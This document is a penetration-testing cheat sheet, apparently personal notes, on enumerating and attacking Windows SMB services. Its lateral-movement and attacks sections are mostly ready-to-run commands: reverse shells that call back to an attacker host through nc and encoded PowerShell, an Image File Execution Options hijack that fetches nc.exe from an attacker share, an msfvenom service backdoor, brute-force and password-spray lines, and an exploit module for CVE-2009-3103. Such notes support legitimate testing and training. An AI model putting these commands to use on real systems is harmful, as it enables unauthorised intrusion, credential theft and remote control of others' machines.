# 139,445 - SMB Server Message Block (SMB) is a Windows network protocol used for sharing files, printers, and other resources, as well as for remote administration and communication between systems over the network. ## Usage {% tabs %} {% tab title="General" %} {% code overflow="wrap" %} ```bash # Download all files without prompting smb: \> recurse ON smb: \> prompt OFF smb: \> mget * # Mount a share (no authentication) sudo mount -t cifs //10.10.10.10/target-share /mnt sudo mount -t cifs - "username='',password=''" //10.10.10.10/my_share /mnt # Mount a share (with authentication) sudo mount -t cifs -o username=x7331,password=Pass123! //10.10.10.10/my_share /path/to/mount ``` {% endcode %} {% endtab %} {% tab title="Transfers" %} Launch SMB server on the attacking host: ```bash impacket-smbserver -smb2support share . -username test -password tes ``` Connect from the target and transfer the file(s): ```powershell # Map the share net use z: \\10.10.10.10\share /USER:test test # Transfer the file(s) copy my_file z:\ ``` {% endtab %} {% tab title="smbmap/smbclient" %} [`smbmap`](https://github.com/ShawnDEvans/smbmap) is a tool for quickly enumerating SMB shares and their permissions, revealing accessible directories and files to identify misconfigurations or sensitive data exposure. ```bash # List shares and permissions smbmap -H 10.10.10.10 # List share's contents smbmap -H 10.10.10.10 -r my_share # Spider the share smbmap -u x7331 -p Passw0rd123! -H 10.10.10.10 -r my_share --depth 3 # Download a file smbmap -H 10.10.10.10 --download "my_share\target_file" # Upload a file smbmap -H 10.10.10.10 --upload target_file "my_share\target_file" ``` [`smbclient`](https://www.samba.org/samba/docs/current/man-html/smbclient.1.html) is a command-line utility for interacting with SMB shares, allowing authentication, navigation, and file operations, making it useful for both enumeration and exploitation. ```bash # List shares via a null session smbclient -N -L //10.10.10.10 # Connect to a share smbclient -U user //10.129.42.253/my_share smbclient //target/my_share -U "domain\x7331%Password123\!" ``` {% endtab %} {% tab title="rpc" %} Remote Procedure Call (RPC) is a protocol that enables communication and execution of functions on remote systems. It can be leveraged to enumerate services, query system information, and interact with administrative interfaces on Windows hosts, providing insight into target configurations and potential attack paths without requiring direct login. ```bash # Connect via a null session rpcclient -U "" -N 10.10.10.10 ``` RPC can be used for enumeration tasks: ```bash # System information srvinfo # Enumerate everything netshareenumall # Enumerate users enumdomusers # Enumerate the SID of a user lookupnames user # Enumerate user information queryuser RID # Enumerate groups enumalsgroups # Enumerate local groups enumalsgroups builtin # Enumerate domains enumdomains # Enumerate privileges enumprivs # Enumerate the password policy getusrdompwinfo 1000 ``` It can also be used for certain operations: ```bash # Create a new user createdomuser user1 # Set user's password setuserinfo2 x7331 24 'Pass123!' # Change a user's password setuserinfo2 x7331 23 'ComplexP4ssw0rd!' chgpasswd3 x7331 # Create a new share netshareadd "C:\Windows" "Windows" 10 "my_share" ``` {% endtab %} {% tab title="smbcacls" %} {% code overflow="wrap" %} ```bash # List directory permissions smbcacls -N '//10.10.10.10/my_share' /my_directory # # List directory permissions recursively for i in $(ls); do echo $i; smbcacls -N '//10.10.10.103/my_share' /my_dir/$i ; done ``` {% endcode %} {% endtab %} {% endtabs %} ## Enumeration Basic enumeration can be performed with `nmap` and a couple of MSF's modules: {% code overflow="wrap" %} ```bash # Nmap sudo nmap -sV -p 139,445 -script smb* 10.10.10.10 # MSF - Enumerate SMB's version msf6 > use auxiliary/scanner/smb/smb_version # MSF - Enumerate users msf6 > use auxiliary/scanner/smb/smb_login ``` {% endcode %} [enum4linux-ng](https://github.com/cddmp/enum4linux-ng) is a Python rewrite of the original `enum4linux.pl`, designed to automate information gathering from Windows and Samba systems. It wraps around `nmblookup`, `net`, `rpcclient`, and `smbclient` to extract usernames, groups, shares, domain details, and password policies, providing structured output that accelerates Active Directory and SMB reconnaissance. {% code overflow="wrap" %} ```bash enum4linux-ng 172.16.10.3 ``` {% endcode %} [impacket-samrdump](https://github.com/fortra/impacket/blob/master/examples/samrdump.py) uses the SAMR protocol to enumerate users, groups, and policy data from Windows or domain controllers. By leveraging Impacket, it exposes domain account structures without requiring administrative privileges, making it effective for mapping Active Directory environments and identifying potential escalation paths. {% code overflow="wrap" %} ```bash impacket-samrdump 172.16.10.3 ``` {% endcode %} ## Lateral Movement To successfully use SMB-based techniques, **administrative privileges on the target host** are typically required. In addition, the **necessary network ports**, usually TCP 445 and 139 (and sometimes 135 depending on the tool), must be open and accessible. Because of User Account Control (UAC), **only the built-in local administrator account with RID 500 and privileged domain users** can fully leverage tools such as `PsExec` for remote execution. ### Named Pipes Named pipes are communication channels that allow processes to exchange data locally or remotely. In Windows, they are commonly exposed over SMB and are used to interact with services such as the Service Control Manager (SCM) or Task Scheduler. Named pipes are accessed through the `IPC$` share over port `445` and allow remote communication with Windows services. For example, the `svcctl` pipe is used to remotely create, start, or stop services and is leveraged by tools such as `PsExec` and `smbexec`. Similarly, the `atsvc` pipe allows remote task scheduling and is used by tools like `atexec`. ### Windows #### PsExec [PsExec](https://learn.microsoft.com/en-us/sysinternals/downloads/psexec), part of Microsoft’s [Sysinternals](https://learn.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) suite, enables RCE and retrieves output through a named pipe over SMB: 1. The tool first connects to the hidden `ADMIN$` share, which maps to the `C:\Windows` directory on the target system. 2. It then uses the SCM to create and start the PsExec service and establish a named pipe for communication. 3. Finally, it redirects the console I/O through this pipe, enabling interactive command execution. An advantage of PsExec is that it solves the “double-hop” authentication problem. It passes credentials directly and creates an interactive logon session (Type 2), which allows access to network resources from the remote session. ```bash # As the target user .\PsExec.exe \\SRV02 -i -u batman\x7331 -p Passw0rd123! cmd # As SYSTEM .\PsExec.exe \\SRV02 -i -s -u batman\x7331 -p Passw0rd123! cmd ``` #### SharpNoPSExec [SharpNoPSExec](https://github.com/juliourena/SharpNoPSExec) is designed to reduce detection by avoiding the creation of new services or writing files to disk. Instead, it searches for existing services that are disabled or manually started, currently stopped, and running with `LocalSystem` privileges. It then temporarily modifies the binary path of one service to execute the attacker’s payload. After execution, the tool restores the original configuration, reducing the likelihood of detection. {% code overflow="wrap" %} ```shellscript # Start a listener (attacker host) nc -lnvp 8080 # Execute the revshell payload to receive a SYSTEM shell (pivot host) .\SharpNoPSExec.exe --target=172.20.0.52 --payload="c:\windows\system32\cmd.exe /c powershell -exec bypass -nop -e ...SNIP...AbwBzAGUAKAApAA==" ``` {% endcode %} #### NimExec [NimExec](https://github.com/frkngksl/NimExec) is a fileless remote execution tool that interacts directly with the Service Control Manager Remote Protocol (MS‑SCMR). It modifies the binary path of a chosen service to run a command and later restores the original configuration. This is achieved by crafting custom RPC packets over SMB and the `svcctl` pipe. NimExec supports authentication using NTLM hashes and benefits from cross‑platform compilation due to the Nim programming language. {% code overflow="wrap" %} ```shellscript # Installation process $ sudo apt install nim $ git clone https://github.com/frkngksl/NimExec $ cd NimExec/ $ nimble install ptr_math nimcrypto hostname $ nim c -d:release --gc:markAndSweep --cpu:amd64 --os:windows --cc:gcc --gcc.exe:x86_64-w64-mingw32-gcc --gcc.linkerexe:x86_64-w64-mingw32-gcc -o:NimExec.exe Main.nim # Start a listener (attacker host) nc -lnvp 8080 # Execute the revshell payload to receive a SYSTEM shell (pivot host) > .\NimExec -u x7331 -d batman.local -p Passw0rd123! -t 172.10.10.252 -c "cmd.exe /c powershell -e JABjAGwAaQBlAG...SNIP...AbwBzAGUAKAApAA==" -v ``` {% endcode %} #### Registry-based execution If an attacker has remote registry write access, this can effectively provide RCE. This method uses the `winreg` SMB pipe and requires the Remote Registry service to be enabled, which is usually the case on Windows Server systems. A common technique is to modify the Image File Execution Options registry key for a frequently used application. When the program is launched, the specified payload is executed. To host a payload, an SMB share can be created on the attacker system. The registry key can then be modified so that when a program such as Microsoft Edge runs, it triggers the attacker’s payload and establishes a reverse shell. {% code overflow="wrap" %} ```shell # Start an SMB server (attacker host) sudo python3 smbserver.py share -smb2support /home/x7331/nc.exe # Start a listener (attacker host) nc -lnvp 8080 # Execute the payload (pivot host) reg.exe add "\\host02.batman.local\HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msedge.exe" /v Debugger /t reg_sz /d "cmd /c copy \\172.30.10.99\share\nc.exe && nc.exe -e \windows\system32\cmd.exe 172.30.10.99 8080" ``` {% endcode %} To use SMB shares without authentication, insecure guest authentication must be enabled. This requires setting the `AllowInsecureGuestAuth` registry value to 1. By default, this setting is disabled in SMBv2 and SMBv3. {% code overflow="wrap" %} ```powershell # Enable guest authentication reg.exe add HKLM\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters /v AllowInsecureGuestAuth /t REG_DWORD /d 1 /f # Confirm guest authentication reg.exe query HKLM\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters /v AllowInsecureGuestAuth ``` {% endcode %} ### Linux From a Linux host, we can use multiple tools from [Impacket](https://github.com/fortra/impacket). #### impacket-psexec The [`psexec.py`](https://github.com/fortra/impacket/blob/master/examples/psexec.py) script provides functionality similar to the Windows [PsExec](#psexec) utility which results in a reliable `SYSTEM` shell, although more detectable because it writes files to disk. ```bash # Get a SYSTEM shell for the target host impacket-psexec BATMAN/x7331:'Passw0rd123!'@182.30.10.53 ``` #### impacket-smbexec The [`smbexec.py`](https://github.com/fortra/impacket/blob/master/examples/smbexec.py) script achieves RCE without uploading a binary to the target. Instead, it leverages native Windows SMB and MSRPC mechanisms to create and manage a service remotely, communicating exclusively over port 445. Because it avoids writing executables to disk, this approach is generally quieter and reduces the risk of detection, although it is slightly less interactive than `impacket-psexec`. ```shell # Get a SYSTEM shell for the target host impacket-smbexec BATMAN/x7331:'Passw0rd123!'@182.30.10.53 ``` #### impacket-services The [`services.py`](https://github.com/fortra/impacket/blob/master/examples/services.py) script allows direct interaction with Windows services through MSRPC. It can list, start, stop, create, delete, and modify services remotely. This makes it useful for lateral movement and privilege escalation, as attackers can either create a new malicious service or modify an existing one to execute a payload. This method is non‑interactive, meaning command output is not displayed in real time. {% code overflow="wrap" %} ```shell # List services impacket-services BATMAN/x7331:'Passw0rd123!'@182.30.10.53 list # Create the payload msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.207 LPORT=9001 -f exe-service -o revshell_9001.exe # Start an SMB server to host the payload sudo impacket-smbserver share -smb2support ./ # Start a listener nc -lnvp 9001 # Create a new malicious service impacket-services BATMAN/x7331:'Passw0rd123!'@182.30.10.53 create -name 'Service Backdoor' -display 'Service Backdoor' -path "\\\\10.10.14.207\\share\\revshell_9001.exe" # View the service configuration impacket-services BATMAN/x7331:'Passw0rd123!'@182.30.10.53 config -name 'Service Backdoor' # Start the malicious service to receive a SYSTEM shell impacket-services BATMAN/x7331:'Passw0rd123!'@182.30.10.53 start -name 'Service Backdoor' # Delete the malicious service impacket-services BATMAN/x7331:'Passw0rd123!'@182.30.10.53 delete -name 'Service Backdoor' ``` {% endcode %} This method is also useful for abusing services that run under specific privileged accounts, allowing impersonation or execution in a higher‑privilege context. {% code overflow="wrap" %} ```bash # Check the target service's configuration impacket-services BATMAN/x7331:'Passw0rd123!'@182.30.10.53 config -name Spooler # Modify the binpath and configurations as required (start type 2 = AUTO START) impacket-services BATMAN/x7331:'Passw0rd123!'@182.30.10.53 change -name Spooler -path "\\\\10.10.14.207\\share\\revshell_9001.exe" -start_type 2 # Start the malicious service impacket-services BATMAN/x7331:'Passw0rd123!'@182.30.10.53 start -name Spooler ``` {% endcode %} #### impacket-atexec Finally, the [`atexec.py`](https://github.com/fortra/impacket/blob/master/examples/atexec.py) script uses the Windows Task Scheduler through the `atsvc` named pipe. It schedules a remote task that executes a specified command or payload and retrieves the output through the `ADMIN$` share. This technique is also file‑less and stealthier than traditional service‑based approaches. However, it requires clock synchronization between the attacker and the target system and is typically used to deploy reverse shells or short‑lived commands during lateral movement. {% code overflow="wrap" %} ```bash # Start a listener nc -lnvp 8080 # Execute the revshell payload to receive a SYSTEM shell impacket-atexec BATMAN/x7331:'Passw0rd123!'@182.30.10.53 "powershell -e ...SNIP...AbwBzAGUAKAApAA==" ``` {% endcode %} ## Attacks ### Passwords {% tabs %} {% tab title="Brute Force" %} ```bash # BFA with wordlists hydra -L -P smb:// # BFA a target user hydra -l -P smb:// ``` {% endtab %} {% tab title="Password Spray" %} We can password spray with `nxc`: {% code overflow="wrap" fullWidth="true" %} ```bash # Domain nxc smb 172.16.10.3 -u -p Password123! --continue-on-success # Local nxc smb 172.16.10.3 -u -p Password123! --continue-on-success --local-auth ``` {% endcode %} `hydra` defaults on attacking the domain. To force local authentication we must prepend the local machine name (e.g. `DC01`) or `.\` to the username in our userlist. For instance, `DC01\Administrator` or `.\Administrator`. ```bash # Domain hydra -U -p smb:// ``` {% endtab %} {% tab title="Nmap Vuln Scan" %} ```bash sudo nmap -script=smb-vuln\* -p445 ``` {% endtab %} {% endtabs %} ### NTLM Theft For NTLM theft via SMB, see [here](https://x7331.gitbook.io/boxes/tl-dr/active-directory/attacks/ntlm-relay#ntlm-theft). ### NTLM Relay For NTLM Relay-related information, see [here](https://x7331.gitbook.io/boxes/tl-dr/active-directory/attacks/ntlm-relay). ## Vulnerabilities ### **SMBv2 Negotiation** Windows Vista (Gold, SP1, SP2), Windows Server 2008 (Gold, SP2), and Windows 7 Release Candidate are affected by a RCE vulnerability ([CVE-2009-3103](https://nvd.nist.gov/vuln/detail/cve-2009-3103)), aka **SMBv2 Negotiation Vulnerability,** in the SMBv2 protocol implementation within `srv2.sys`, the kernel-mode driver responsible for SMBv2 handling in certain Microsoft Windows versions. A flaw in the processing of the `Process ID High` header field in a `NEGOTIATE PROTOCOL REQUEST` packet allows an attacker to trigger an array index error by supplying an ampersand (`&`) character. This malformed input leads to an out-of-bounds memory dereference in kernel space. When exploited, it can result in either a denial of service through a system crash (blue screen) or, under certain conditions, arbitrary code execution with kernel-level privileges. The attack is conducted over TCP port `445` and does not require authentication, making it highly dangerous when SMBv2 services are exposed to untrusted networks. A [MSF module](https://www.rapid7.com/db/modules/exploit/windows/smb/ms09_050_smb2_negotiate_func_index/) exists for exploiting the vulnerability. ```bash msf > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index ```